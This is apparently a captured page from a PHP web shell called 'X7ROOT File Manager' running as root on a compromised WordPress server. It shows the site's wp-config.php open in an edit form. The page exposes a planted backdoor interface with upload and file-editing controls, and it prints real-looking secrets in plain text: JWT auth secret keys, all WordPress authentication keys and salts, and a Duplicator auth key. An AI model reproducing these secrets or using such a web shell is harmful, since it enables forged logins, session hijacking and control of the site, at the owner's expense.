X7ROOT File Manager
PHP:
8.2.31
OS:
Linux
User:
Root
/
wordpress
/
core
📤 Upload
📝 New File
📁 New Folder
Close
Editing: wp-config.php
<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the * installation. You don't have to use the web site, you can * copy this file to "wp-config.php" and fill in the values. * * This file contains the following configurations: * * * MySQL settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://codex.wordpress.org/Editing_wp-config.php * * @package WordPress */ /** * Database connection information is automatically provided. * There is no need to set or change the following database configuration * values: * DB_HOST * DB_NAME * DB_USER * DB_PASSWORD * DB_CHARSET * DB_COLLATE */ define('JWT_AUTH_SECRET_KEY', 'hD&61m>AJLV0+IY*pXINy+]b+CDCF]em>h>_uHXac3AAXlhhAU=i4s?__ZT1pF5&'); define('JWT_AUTH_CORS_ENABLE', true); /** * Authentication Unique Keys and Salts. * * Change these to different unique phrases! * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service} * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again. * * @since 2.6.0 */ define('JWT_AUTH_SECRET_KEY', '8u[WyKqV,uIbJ}R.E%0BB:K@VRf>bQ*iv+mS#LXbLmX_1>m&B>LED=E^Ub)P(mAV'); define('AUTH_KEY', '=5-E|(hjN0=iSRcMw^z6S,YQf<s~}B{7J^.Q9ha+atiGBv|uQP[3fLaF$!|ZM{H1'); define('SECURE_AUTH_KEY', '_g25zMrS8K<ST^-|vz0-cK;sq?-gKSo%dzVm*)!Ln{4r-O!t4:b]N*,%=)xn|tbS'); define('LOGGED_IN_KEY', ')NIu@j$*6(:$W%jBZ-qK4*QsF!Pd0G)QX5e0Z50.tqo:3yr<o>U@k=ol-t]DVD%z'); define('NONCE_KEY', 'j~v7Etf~i?iU(sCX=={JIzj]pB:UM@<Y;~sjFlWt9.9e=7n7t5BB,A,_gw*?fS{{'); define('AUTH_SALT', 'R{uFKGWccEa?ze.s6J6O%.yQvL#jhiUG~:*~uxL+pjNVe$FjP@V7O9vCe,Gm!g[K'); define('SECURE_AUTH_SALT', 'YUhCtET@[(R%vbYc:C}98+g#JKD$gI(<-4|^!U~>BtK5-7.t0IRRjjX5j9Km-_wx'); define('LOGGED_IN_SALT', '?e#}dMF0lQfLJHT-7+DhYMC|ZM<qAKqL#DmP^cliLzTw44fn}GJ%o=7a$_^(#[}1'); define('NONCE_SALT', '*c(}G^No?$(mDC1,xr<O7r3<K,Ur5Btgj}Su8dIkliBoE|$yUT!c=_<I:D1lOlO>'); /** * WordPress Database Table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'fruv_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the Codex. * * @link https://codex.wordpress.org/Debugging_in_WordPress */ if ( ! defined( 'WP_DEBUG') ) { define('WP_DEBUG', false); } define( 'WP_ENVIRONMENT_TYPE', 'production' ); define( 'DUPLICATOR_AUTH_KEY', 'n<1m}hV1tF<N30v!V)NZK@@LIS((zG6y)GvM,.q(@C;wE6Z}E6Y~)S2$j=u`/Roq' ); /* That's all, stop editing! Happy blogging. */ /** Absolute path to the WordPress directory. */ if ( !defined('ABSPATH') ) define('ABSPATH', dirname(__FILE__) . '/'); /** Sets up WordPress vars and included files. */ require_once(ABSPATH . 'wp-settings.php');
Save
Cancel